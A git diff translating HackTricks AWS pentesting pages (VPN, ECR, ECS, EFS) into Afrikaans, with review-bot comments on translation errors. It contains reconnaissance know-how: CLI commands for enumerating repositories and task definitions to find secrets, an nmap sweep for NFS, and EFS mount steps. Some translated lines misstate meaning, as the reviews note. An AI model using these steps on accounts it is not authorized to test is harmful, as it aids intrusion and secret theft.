gateway of 'n transit gateway as die gateway vir die Amazon-kant van die Site-to-Site VPN-verbinding. 
+- **Transit gateway**: 'n Transit-hub wat gebruik kan word om jou VPCs en plaaslike netwerke met mekaar te verbind. Jy gebruik 'n transit gateway of virtuele privaat gateway as die gateway vir die Amazon-kant van die Site-to-Site VPN-verbinding. #### Limitations -- IPv6 traffic is not supported for VPN connections on a virtual private gateway. -- An AWS VPN connection does not support Path MTU Discovery. +- IPv6-verkeer word nie ondersteun vir VPN-verbindinge op 'n virtuele privaat gateway nie. +- 'n AWS VPN-verbinding ondersteun nie Path MTU Discovery nie. -In addition, take the following into consideration when you use Site-to-Site VPN. +Boonop, neem die volgende in ag wanneer jy Site-to-Site VPN gebruik. -- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. +- Wanneer jy jou VPCs aan 'n gemeenskaplike plaaslike netwerk verbind, beveel ons aan dat jy nie-oorlappende CIDR-blokke vir jou netwerke gebruik. -### Client VPN +### KliĂ«nt VPN -**Connect from your machine to your VPC** +**Verbind vanaf jou masjien na jou VPC** #### Concepts -- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. -- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. 
-- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. -- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. -- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. -- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. -- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. -- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. -- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. 
+- **KliĂ«nt VPN eindpunt:** Die hulpbron wat jy skep en konfigureer om kliĂ«nt VPN-sessies in te stel en te bestuur. Dit is die hulpbron waar alle kliĂ«nt VPN-sessies beĂ«indig word. +- **Teiken netwerk:** 'n Teiken netwerk is die netwerk wat jy met 'n KliĂ«nt VPN-eindpunt assosieer. **'n Subnet van 'n VPC is 'n teiken netwerk**. Om 'n subnet met 'n KliĂ«nt VPN-eindpunt te assosieer, stel jou in staat om VPN-sessies te vestig. Jy kan verskeie subnetwerke met 'n KliĂ«nt VPN-eindpunt assosieer vir hoĂ« beskikbaarheid. Alle subnetwerke moet van dieselfde VPC wees. Elke subnet moet aan 'n ander beskikbaarheidsgebied behoort. +- **Roete**: Elke KliĂ«nt VPN-eindpunt het 'n routeringstabel wat die beskikbare bestemmingsnetwerkroetes beskryf. Elke roete in die routeringstabel spesifiseer die pad vir verkeer na spesifieke hulpbronne of netwerke. +- **OutorisasiereĂ«ls:** 'n autorisatiereĂ«l **beperk die gebruikers wat toegang tot 'n netwerk kan verkry**. Vir 'n spesifieke netwerk, konfigureer jy die Active Directory of identiteitsverskaffer (IdP) groep wat toegang verleen. Slegs gebruikers wat tot hierdie groep behoort, kan toegang tot die spesifieke netwerk verkry. **Standaard is daar geen autorisatiereĂ«ls nie** en jy moet autorisatiereĂ«ls konfigureer om gebruikers in staat te stel om toegang tot hulpbronne en netwerke te verkry. +- **KliĂ«nt:** Die eindgebruiker wat met die KliĂ«nt VPN-eindpunt verbind om 'n VPN-sessie te vestig. Eindgebruikers moet 'n OpenVPN-kliĂ«nt aflaai en die KliĂ«nt VPN-konfigurasiefilenaam wat jy geskep het, gebruik om 'n VPN-sessie te vestig. +- **KliĂ«nt CIDR-reeks:** 'n IP-adresreeks waaruit kliĂ«nt IP-adresse toegeken kan word. Elke verbinding met die KliĂ«nt VPN-eindpunt word aan 'n unieke IP-adres van die kliĂ«nt CIDR-reeks toegeken. Jy kies die kliĂ«nt CIDR-reeks, byvoorbeeld, `10.2.0.0/16`. +- **KliĂ«nt VPN-poorte:** AWS KliĂ«nt VPN ondersteun poorte 443 en 1194 vir beide TCP en UDP. Die standaard is poort 443. 
+- **KliĂ«nt VPN-netwerkinterfaces:** Wanneer jy 'n subnet met jou KliĂ«nt VPN-eindpunt assosieer, skep ons KliĂ«nt VPN-netwerkinterfaces in daardie subnet. **Verkeer wat na die VPC van die KliĂ«nt VPN-eindpunt gestuur word, word deur 'n KliĂ«nt VPN-netwerkinterface gestuur**. Bron netwerkadresvertaling (SNAT) word dan toegepas, waar die bron IP-adres van die kliĂ«nt CIDR-reeks na die KliĂ«nt VPN-netwerkinterface IP-adres vertaal word. +- **Verbindingslogging:** Jy kan verbindingslogging vir jou KliĂ«nt VPN-eindpunt inskakel om verbindingsgebeurtenisse te log. Jy kan hierdie inligting gebruik om forensiese ondersoeke te doen, analiseer hoe jou KliĂ«nt VPN-eindpunt gebruik word, of verbindingsprobleme te ontleed. +- **Selfdiensportaal:** Jy kan 'n selfdiensportaal vir jou KliĂ«nt VPN-eindpunt inskakel. KliĂ«nte kan inlog op die web-gebaseerde portaal met hul geloofsbriewe en die nuutste weergawe van die KliĂ«nt VPN-eindpunt konfigurasiefilenaam aflaai, of die nuutste weergawe van die AWS verskafde kliĂ«nt. #### Limitations -- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. -- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** -- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. -- The **client CIDR range cannot be changed** after you create the Client VPN endpoint. -- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. 
-- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. -- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. -- Client VPN supports **IPv4** traffic only. -- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. -- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. +- **KliĂ«nt CIDR-reekse kan nie oorvleuel met die plaaslike CIDR** van die VPC waarin die geassosieerde subnet geleĂ« is nie, of enige roetes wat handmatig by die KliĂ«nt VPN-eindpunt se routeringstabel gevoeg is. +- KliĂ«nt CIDR-reekse moet 'n blokgrootte van ten **minste /22** hĂȘ en mag **nie groter wees as /12 nie.** +- 'n **Deel van die adresse** in die kliĂ«nt CIDR-reeks word gebruik om die **beskikbaarheids** model van die KliĂ«nt VPN-eindpunt te ondersteun, en kan nie aan kliĂ«nte toegeken word nie. Daarom beveel ons aan dat jy **'n CIDR-blok toewys wat twee keer die aantal IP-adresse bevat wat benodig word** om die maksimum aantal gelyktydige verbindings wat jy van plan is om te ondersteun op die KliĂ«nt VPN-eindpunt, in staat te stel. +- Die **kliĂ«nt CIDR-reeks kan nie verander word** nadat jy die KliĂ«nt VPN-eindpunt geskep het nie. +- Die **subnetwerke** wat met 'n KliĂ«nt VPN-eindpunt geassosieer is, **moet in dieselfde VPC wees**. +- Jy **kan nie verskeie subnetwerke van dieselfde beskikbaarheidsgebied met 'n KliĂ«nt VPN-eindpunt assosieer nie**. +- 'n KliĂ«nt VPN-eindpunt **ondersteun nie subnetassosiasies in 'n toegewyde huur VPC nie**. +- KliĂ«nt VPN ondersteun **IPv4** verkeer slegs. +- KliĂ«nt VPN is **nie** Federale Inligting Verwerkingsstandaarde (**FIPS**) **konform nie**. +- As multi-faktor verifikasie (MFA) vir jou Active Directory gedeaktiveer is, kan 'n gebruikerswagwoord nie in die volgende formaat wees nie. 
- ``` - SCRV1:: - ``` +``` +SCRV1:: +``` -- The self-service portal is **not available for clients that authenticate using mutual authentication**. +- Die selfdiensportaal is **nie beskikbaar vir kliĂ«nte wat met behulp van wederkerige verifikasie autentiseer nie**. {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md index 9025829b4..9562d48a1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md 
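Review bot: The nested bullets under items 3 and 4 of the numbered list, and under the Client VPN concepts, lose their indentation in this hunk (e.g. `- - A Site-to-Site VPN connection connects ...` becomes `+- 'n Site-to-Site VPN-verbinding verbind ...`), so they render as top-level items instead of sub-points, and the `SCRV1::` fence is likewise dedented out of the list item it belongs to; keep the original leading spaces. Several AWS resource names are translated literally, which makes them hard to match against the console and CLI: Customer Gateway and Virtual Private Gateway become `KliĂ«nt Gateway` and `Virtuele Privaat Gateway`, and "VPN concentrator" becomes `VPN-konsentrasie` (concentration) rather than konsentrator. Two renderings change meaning: "the group that is allowed access" becomes `groep wat toegang verleen` (a group that grants access, the opposite of the authorization rule being described), and "configuration file" becomes `konfigurasiefilenaam` (file name). The headings `#### Limitations` and `#### Concepts` stay in English while the neighbouring headings are translated, the spelling alternates between `OutorisasiereĂ«ls` and `autorisatiereĂ«ls`, and as displayed the diacritics look mis-encoded (`KliĂ«nt`, `hoĂ«`), so confirm the file is committed as UTF-8.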
@@ -6,49 +6,48 @@ ### ECR -#### Basic Information +#### Basiese Inligting -Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. +Amazon **Elastic Container Registry** (Amazon ECR) is 'n **bestuurde houerbeeld registrasiediens**. Dit is ontwerp om 'n omgewing te bied waar kliĂ«nte met hul houerbeelde kan interaksie hĂȘ deur middel van bekende koppelvlakke. Spesifiek word die gebruik van die Docker CLI of enige verkiesde kliĂ«nt ondersteun, wat aktiwiteite soos die stoot, trek en bestuur van houerbeelde moontlik maak. -ECR is compose by 2 types of objects: **Registries** and **Repositories**. +ECR bestaan uit 2 tipes voorwerpe: **Registrasies** en **Bergings**. -**Registries** +**Registrasies** -Every AWS account has 2 registries: **Private** & **Public**. +Elke AWS-rekening het 2 registrasies: **Privaat** & **Publiek**. -1. **Private Registries**: +1. **Privaat Registrasies**: -- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. - - The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` -- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. -- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... 
-- **Other private registry options**: - - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. - - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. - - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. - - Specific **IAM policies** can be configured to grant different **permissions**. - - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. +- **Privaat per standaard**: Die houerbeelde wat in 'n Amazon ECR privaat registrasie gestoor word, is **slegs toeganklik vir gemagtigde gebruikers** binne jou AWS-rekening of vir diegene aan wie toestemming gegee is. +- Die URI van 'n **privaat berging** volg die formaat `.dkr.ecr..amazonaws.com/` +- **Toegangsbeheer**: Jy kan **toegang beheer** tot jou privaat houerbeelde deur middel van **IAM-beleide**, en jy kan fyn-granige toestemmings op grond van gebruikers of rolle konfigureer. +- **Integrasie met AWS-dienste**: Amazon ECR privaat registrasies kan maklik **geĂŻntegreer word met ander AWS-dienste**, soos EKS, ECS... +- **Ander privaat registrasie opsies**: +- Die Tag onveranderlikheid kolom lys sy status, as tag onveranderlikheid geaktiveer is, sal dit **verhoed** dat beeld **stoot** met **bestaande tags** die beelde oorskryf. +- Die **Enkripsietipe** kolom lys die enkripsie eienskappe van die berging, dit wys die standaard enkripsietipes soos AES-256, of het **KMS** geaktiveerde enkripsies. +- Die **Trek deur kas** kolom lys sy status, as Trek deur kas status Aktief is, sal dit **bergings in 'n eksterne publieke berging in jou privaat berging** kas. 
+- Spesifieke **IAM-beleide** kan geconfigureer word om verskillende **toestemmings** toe te ken. +- Die **skandeer konfigurasie** laat toe om vir kwesbaarhede in die beelde wat binne die berging gestoor is, te skandeer. -2. **Public Registries**: +2. **Publieke Registrasies**: -- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** - - The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. +- **Publieke toeganklikheid**: Houerbeelde wat in 'n ECR Publieke registrasie gestoor word, is **toeganklik vir enigiemand op die internet sonder verifikasie.** +- Die URI van 'n **publieke berging** is soos `public.ecr.aws//`. Alhoewel die `` deel deur die admin na 'n ander string wat makliker om te onthou is, verander kan word. -**Repositories** +**Bergings** -These are the **images** that in the **private registry** or to the **public** one. +Dit is die **beelde** wat in die **privaat registrasie** of in die **publieke** een is. > [!NOTE] -> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. +> Let daarop dat om 'n beeld na 'n berging op te laai, die **ECR berging dieselfde naam as die beeld moet hĂȘ**. -#### Registry & Repository Policies +#### Registrasie & Berging Beleide -**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: +**Registrasies & bergings** het ook **beleide wat gebruik kan word om toestemmings aan ander beginsels/rekeninge toe te ken**. Byvoorbeeld, in die volgende berging beleid beeld kan jy sien hoe enige gebruiker van die hele organisasie toegang tot die beeld sal hĂȘ:
-#### Enumeration - +#### Enumerasie ```bash # Get repos aws ecr describe-repositories @@ -68,39 +67,34 @@ aws ecr-public describe-repositories aws ecr get-registry-policy aws ecr get-repository-policy --repository-name ``` - -#### Unauthenticated Enum +#### Ongeauthentiseerde Enum {{#ref}} ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md {{#endref}} -#### Privesc +#### Privilege Verhoging -In the following page you can check how to **abuse ECR permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **ECR-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-ecr-privesc.md {{#endref}} -#### Post Exploitation +#### Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-ecr-post-exploitation.md {{#endref}} -#### Persistence +#### Volharding {{#ref}} ../aws-persistence/aws-ecr-persistence.md {{#endref}} -## References +## Verwysings - [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md index cbbf596fe..167a870a3 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md 
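Review bot: The sub-bullets under "Other private registry options" in the first ECR hunk are flattened to top level (`- - The Tag immutability column ...` becomes `+- Die Tag onveranderlikheid kolom ...`), which breaks the nesting of that list; keep the leading spaces. Terminology in the translated lines is misleading for readers who will map it back to IAM and the CLI: `Bergings` (storage) for repositories, `Registrasies` (registrations) for registries, `beginsels` (principles) for principals in the policy sentence, and `Trek deur kas` as a literal rendering of pull through cache. Consider leaving repository, registry and principal untranslated, since they must match the terms in `aws ecr describe-repositories` and `aws ecr get-repository-policy` right below. The blank line between `#### Enumerasie` and the bash fence is also dropped; harmless in markdown, but it is unrelated churn in a translation commit.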
@@ -4,31 +4,30 @@ ## ECS -### Basic Information +### Basiese Inligting -Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. +Amazon **Elastic Container Services** of ECS bied 'n platform om **gecontaineriseerde toepassings in die wolk te huisves**. ECS het twee **ontplooiing** metodes, **EC2** instansie tipe en 'n **serverless** opsie, **Fargate**. Die diens **maak dit baie maklik en probleemloos om houers in die wolk te laat loop**. -ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. +ECS werk met die volgende drie boublokke: **Clusters**, **Dienste**, en **Taak Definisies**. -- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. -- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. - - There **2 types of applications**: - - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. - - **Task**: A standalone task that runs and terminates. For example, a batch job. 
- - Among the service applications, there are **2 types of service schedulers**: - - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. - - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. -- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... - - Check **env variables for sensitive info**! +- **Clusters** is **groepe van houers** wat in die wolk loop. Soos voorheen genoem, is daar twee lanseringstipes vir houers, EC2 en Fargate. AWS definieer die **EC2** lanseringstype as diegene wat kliĂ«nte “toelaat om \[hul] gecontaineriseerde toepassings op 'n kluster van Amazon EC2 instansies wat \[hulle] **bestuur**” te laat loop. **Fargate** is soortgelyk en word gedefinieer as “\[wat] jou toelaat om jou gecontaineriseerde toepassings **sonder die behoefte om** die agtergrondinfrastruktuur te voorsien en te bestuur”. +- **Dienste** word binne 'n kluster geskep en is verantwoordelik vir **die uitvoering van die take**. Binne 'n diensdefinisie **definieer jy die aantal take om te loop, outo-skaal, kapasiteitsverskaffer (Fargate/EC2/Buitenshuise),** **netwerk** inligting soos VPC’s, subnetwerke, en sekuriteitsgroepe. +- Daar is **2 tipes toepassings**: +- **Diens**: 'n groep take wat 'n langlopende rekenaarwerk hanteer wat gestop en herbegin kan word. Byvoorbeeld, 'n webtoepassing. 
+- **Taak**: 'n standalone taak wat loop en beĂ«indig. Byvoorbeeld, 'n batch werk. +- Onder die diens toepassings, is daar **2 tipes diens skeduleerders**: +- [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Die replika skeduleringstrategie plaas en **onderhou die gewenste aantal** take oor jou kluster. As om een of ander rede 'n taak afsluit, word 'n nuwe een in dieselfde of 'n ander node gelanseer. +- [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Ontplooi presies een taak op elke aktiewe houerinstansie wat die nodige vereistes het. Daar is geen behoefte om 'n gewenste aantal take, 'n taak plasingstrategie, of diens outo-skaalbeleide te spesifiseer nie. +- **Taak Definisies** is verantwoordelik vir **die definisie van watter houers sal loop** en die verskillende parameters wat saam met die houers geconfigureer sal word soos **poortkaarte** met die gasheer, **omgewing veranderlikes**, Docker **entrypoint**... +- Kontroleer **omgewing veranderlikes vir sensitiewe inligting**! -### Sensitive Data In Task Definitions +### Sensitiewe Gegewens In Taak Definisies -Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. +Taak definisies is verantwoordelik vir **die konfigurasie van die werklike houers wat in ECS sal loop**. Aangesien taak definisies definieer hoe houers sal loop, kan 'n oorvloed van inligting daarin gevind word. -Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. - -### Enumeration +Pacu kan ECS opnoem (lys-klusters, lys-houer-instanties, lys-dienste, lys-taak-definisies), dit kan ook taak definisies dump. +### Opname ```bash # Clusters info aws ecs list-clusters 
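Review bot: This ECS hunk also flattens nested bullets (`- - There 2 types of applications:` and the REPLICA/DAEMON sub-items become top-level `+-` lines), so the scheduler types no longer read as sub-points of Services; restore the indentation. Some translations distort technical meaning: `poortkaarte` (port cards) for port mappings, `Buitenshuise` (outdoors) for the External capacity provider, and `Opname` for the Enumeration heading where the ECR file in this same patch uses `Enumerasie`; pick one term for that heading across files. The security-relevant reminder to check env variables for sensitive info is preserved correctly, but `kluster` and `Clusters` alternate within the same list.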
@@ -52,35 +51,30 @@ aws ecs describe-tasks --cluster --tasks ## Look for env vars and secrets used from the task definition aws ecs describe-task-definition --task-definition : ``` - -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md {{#endref}} -### Privesc +### Privilege Verhoging -In the following page you can check how to **abuse ECS permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **ECS-toestemmings te misbruik om privileges te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-ecs-privesc.md {{#endref}} -### Post Exploitation +### Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-ecs-post-exploitation.md {{#endref}} -### Persistence +### Volharding {{#ref}} ../aws-persistence/aws-ecs-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md index bcf4e58d4..c37f40dbe 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md 
@@ -4,22 +4,21 @@ ## EFS -### Basic Information +### Basiese Inligting -Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms. +Amazon Elastic File System (EFS) word aangebied as 'n **volledig bestuurde, skaalbare, en elastiese netwerk lĂȘerstelsel** deur AWS. Die diens fasiliteer die skepping en konfigurasie van **lĂȘerstelsels** wat gelyktydig deur verskeie EC2-instanties en ander AWS-dienste benader kan word. Die sleutelkenmerke van EFS sluit in sy vermoĂ« om outomaties te skaal sonder handmatige ingryping, lae-latensie toegang te voorsien, hoĂ«-deurvoer werklading te ondersteun, data-duursaamheid te waarborg, en naatloos te integreer met verskeie AWS-sekuriteitsmeganismes. -By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**. +Deur **standaard** sal die EFS-gids om te monteer **`/`** wees, maar dit kan 'n **ander naam** hĂȘ. -### Network Access +### Netwerk Toegang -An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**. +'n EFS word in 'n VPC geskep en sal **standaard toeganklik wees in al die VPC-subnetwerke**. Die EFS sal egter 'n Sekuriteitsgroep hĂȘ. 
Om **toegang te gee aan 'n EC2** (of enige ander AWS-diens) om die EFS te monteer, is dit nodig om **in die EFS-sekuriteitsgroep 'n inkomende NFS** (poort 2049) **reĂ«l van die EC2-sekuriteitsgroep toe te laat**. -Without this, you **won't be able to contact the NFS service**. +Sonder dit, **sal jy nie in staat wees om die NFS-diens te kontak nie**. -For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount) - -### Enumeration +Vir meer inligting oor hoe om dit te doen, kyk: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount) +### Enumerasie ```bash # Get filesystems and access policies (if any) aws efs describe-file-systems @@ -39,12 +38,10 @@ aws efs describe-replication-configurations # Search for NFS in EC2 networks sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure ``` - > [!CAUTION] -> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. +> Dit mag wees dat die EFS-mountpunt binne dieselfde VPC is, maar in 'n ander subnet. As jy seker wil wees dat jy al die **EFS-punte vind, sal dit beter wees om die `/16` netmask te skandeer**. ### Mount EFS - ```bash sudo mkdir /efs 
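Review bot: As displayed, the added Network Access paragraph in the first EFS hunk is split, and the continuation starting `Om **toegang te gee aan 'n EC2**` carries no leading `+`; if that is really a separate line in the commit the hunk will not apply, so confirm it is a single line. `Deur **standaard**` is a calque of "By default" (`By verstek` is the idiomatic form), and the sentence that follows keeps the important point that NFS port 2049 must be allowed from the EC2 security group, which is the detail a reader will act on, so it deserves a clean rendering.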
@@ -58,70 +55,63 @@ sudo yum install amazon-efs-utils # If centos sudo apt-get install amazon-efs-utils # If ubuntu sudo mount -t efs :/ /efs/ ``` +### IAM Toegang -### IAM Access - -By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. However, File System policies could be in place **only allowing principals with specific permissions** to access it.\ -For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**: - +Deur **standaard** sal enigeen met **netwerktoegang tot die EFS** in staat wees om dit te monteer, **te lees en te skryf selfs as 'n wortelgebruiker**. egter, File System-beleide kan in plek wees **wat slegs hoofde met spesifieke toestemmings** toelaat om toegang te verkry.\ +Byvoorbeeld, hierdie File System-beleid **sal nie toelaat om selfs te monteer** die lĂȘerstelsel as jy **nie die IAM-toestemming** het nie: ```json { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", - "Statement": [ - { - "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "", - "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", +"Statement": [ +{ +"Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "", +"Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", +"Condition": { +"Bool": { +"elasticfilesystem:AccessedViaMountTarget": "true" +} +} +} +] } ``` - -Or this will **prevent anonymous access**: +Of dit sal **anonieme toegang voorkom**:
-Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command: - +Let daarop dat jy die tipe "efs" in die monteeropdrag MOET gebruik om lĂȘerstelsels wat deur IAM beskerm word te monteer: ```bash sudo mkdir /efs sudo mount -t efs -o tls,iam :/ /efs/ # To use a different pforile from ~/.aws/credentials # You can use: -o tls,iam,awsprofile=namedprofile ``` +### Toegangspunte -### Access Points +**Toegangspunte** is **aansoek**-spesifieke toegangspunte **tot 'n EFS-lĂȘerstelsel** wat dit makliker maak om aansoektoegang tot gedeelde datastelle te bestuur. -**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets. - -When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data. - -**You can mount the File System from an access point with something like:** +Wanneer jy 'n toegangspunt skep, kan jy **die eienaar en POSIX-toestemmings** vir die lĂȘers en gidse wat deur die toegangspunt geskep word, spesifiseer. Jy kan ook **'n pasgemaakte wortelgidse** vir die toegangspunt definieer, hetsy deur 'n bestaande gidse te spesifiseer of deur 'n nuwe een met die gewenste toestemmings te skep. Dit stel jou in staat om **toegang tot jou EFS-lĂȘerstelsel op 'n per-aansoek of per-gebruiker basis te beheer**, wat dit makliker maak om jou gedeelde lĂȘerdata te bestuur en te beveilig. 
